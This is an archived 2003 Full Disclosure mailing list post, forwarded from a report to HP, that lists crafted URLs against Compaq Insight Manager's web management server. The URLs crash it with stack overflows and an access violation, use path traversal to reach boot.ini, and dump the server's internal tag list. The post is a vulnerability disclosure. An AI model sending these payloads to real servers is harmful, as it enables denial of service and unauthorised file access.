Full Disclosure mailing list archives
Compaq/HP WBEM stuff (fwd)
From: bashis <mcw () ns wcd se>
Date: Thu, 3 Apr 2003 07:44:27 +0200 (CEST)
Compaq Insight Manager - Web-Based Management Exploitable w3 server? I don't know and i don't care... Regards, bashis
Subject: Compaq/HP WBEM stuff To: security-alert () hp com Date: Sun, 9 Mar 2003 22:56:04 +0100 (CET) Compaq Web-Based Management stuff. All versions of WBEM seems to be affected.. (These 'tags' works also with 'secure' HTTPS tcp/2381.) http://<IP>:2301/<!.StringRedirecturl> Stack overflow (0xc00000fd), Address: 0x77f0c3dc http://<IP>:2301/<!> Stack overflow (0xc00000fd), Address: 0x77f0c3dc http://<IP>:2301/survey/<!> Stack overflow (0xc00000fd), Address: 0x10039869 http://<IP>:2301/<!.StringHttpRequest=Url> Stack overflow (0xc00000fd), Address: 0x77f0c3dc http://<IP>:2301/survey/<!.StringHttpRequest=Url> Stack overflow (0xc00000fd), Address: 0x10039869 http://<IP>:2301/<!.StringIsapiECB=lpszPathInfo> Stack overflow (0xc00000fd), Address: 0x77f0c3dc http://<IP>:2301/<!.ObjectIsapiECB> Stack overflow (0xc00000fd), Address: 0x77f0c3dc GET /<!.FunctionContentType=(About 250 AAAAA:s)> HTTP/1.0 Access violation (0xc0000005), Address: 0x100368a5 Check file existens. (with a nice 'input box';) http://<IP>:2301/<!.DebugSearchPaths>?Url=%2F..%2F..%2F..%2F..%2Fboot.ini ..... plus many more tags. Get a whole 'TAG' list with: http://<IP>:2301/<!.TableDisplayTags> Regards, bashis
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Compaq/HP WBEM stuff (fwd) bashis (Apr 03)